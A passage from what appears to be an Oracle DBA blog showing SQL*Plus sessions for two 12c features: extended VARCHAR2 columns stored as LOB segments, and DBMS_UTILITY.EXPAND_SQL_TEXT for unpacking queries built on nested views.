Variable Size            1056965304 bytes
Database Buffers          570425344 bytes
Redo Buffers                7135232 bytes
Database mounted.
Database opened.
SQL> show parameter max_string_size

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
max_string_size                      string      EXTENDED


SQL> connect test/test
Connected.
SQL> create table employee (emp_id integer, emp_name varchar2(20), life_story varchar2(32000));

Table created.

SQL> desc employee
 Name                                      Null?  Type
 ----------------------------------------- ------ ---------------
 EMP_ID                                           NUMBER(38)
 EMP_NAME                                         VARCHAR2(20)
 LIFE_STORY                                       VARCHAR2(32000)

SQL> select segment_name, segment_type from user_segments;

no rows selected

SQL> insert into employee values (1,'John','Wage Slave');

1 row created.

SQL> commit;

Commit complete.

Looking at the segments that now exist, we can see that creating a table with an extended VARCHAR2 column was actually implemented using a TABLE segment plus a LOBSEGMENT and associated LOBINDEX; behind the scenes, extended columns use LOB storage.

SQL> select segment_name, segment_type from user_segments;

SEGMENT_NAME                          SEGMENT_TYPE
------------------------------------- ---------------------------
EMPLOYEE                              TABLE
SYS_IL0000092103C00003$$              LOBINDEX
SYS_LOB0000092103C00003$$             LOBSEGMENT
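
As a quick sanity check (a sketch rather than a captured run; the 31000-character value is arbitrary), we can insert a value far beyond the old 4000 byte limit and confirm the stored length:

SQL> insert into employee values (2,'Jane',rpad('x',31000,'x'));

SQL> select emp_id, length(life_story) from employee where emp_id = 2;

We would expect LENGTH(LIFE_STORY) to come back as 31000.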




Categories: DBA Blogs

Oracle 12c New Features - DBMS_UTILITY.EXPAND_SQL_TEXT

Thu, 2013-06-27 20:34
As a DBA you occasionally get handed SQL statements many hundreds of lines long and asked to help tune them.  Often the SQL selects from views based on views based on views, which can force the database to access the same table multiple times and join to itself, leading to poor performance.  To work out what the SQL is actually doing, the DBA needs to extract the SQL from every view, merge it, and then try to work out whether it can be improved.  This can be time consuming, but 12c has introduced DBMS_UTILITY.EXPAND_SQL_TEXT to help.

The following gives an example of expanding a simple SQL statement based on views.


SQL> create table employee (emp_id integer, emp_name varchar2(20));

Table created.

SQL> insert into employee values (1,'John');

1 row created.

SQL> insert into employee values (2,'David');

1 row created.

SQL> commit;

Commit complete.

SQL> create view v1 as select * from employee;

View created.

SQL> create view v2 as select * from employee;

View created.

If we were just given the following piece of SQL, we could run it through dbms_utility.expand_sql_text to get a better idea of what the logic in V1 and V2 is.

SQL> select * from v1 union select * from v2;

    EMP_ID EMP_NAME
---------- --------------------
         1 John
         2 David

SQL> set linesize 32000 pagesize 0 serveroutput on
SQL> declare
   original_sql clob :='select * from v1 union select * from v2';
   expanded_sql clob := empty_clob();
begin
    dbms_utility.expand_sql_text(original_sql,expanded_sql);
    dbms_output.put_line(expanded_sql);
end;
/  
(SELECT "A3"."EMP_ID" "EMP_ID","A3"."EMP_NAME" "EMP_NAME" FROM  (SELECT "A4"."EMP_ID" "EMP_ID","A4"."EMP_NAME" "EMP_NAME" FROM TEST."EMPLOYEE" "A4") "A3")UNION (SELECT "A2"."EMP_ID" "EMP_ID","A2"."EMP_NAME" "EMP_NAME" FROM  (SELECT "A5"."EMP_ID" "EMP_ID","A5"."EMP_NAME" "EMP_NAME" FROM TEST."EMPLOYEE" "A5") "A2")

PL/SQL procedure successfully completed.

So we can see from the expanded query that the original SQL was just doing a UNION of two identical selects from table TEST.EMPLOYEE, which we can easily simplify to a single query with better performance.
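
One detail to remember when rewriting: UNION removes duplicates, so the strictly equivalent single query needs DISTINCT unless the selected columns are known to be unique (a sketch):

SQL> select distinct emp_id, emp_name from employee;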

# A reference from Jonathan Lewis indicates that this procedure previously existed in package DBMS_SQL2.
Categories: DBA Blogs
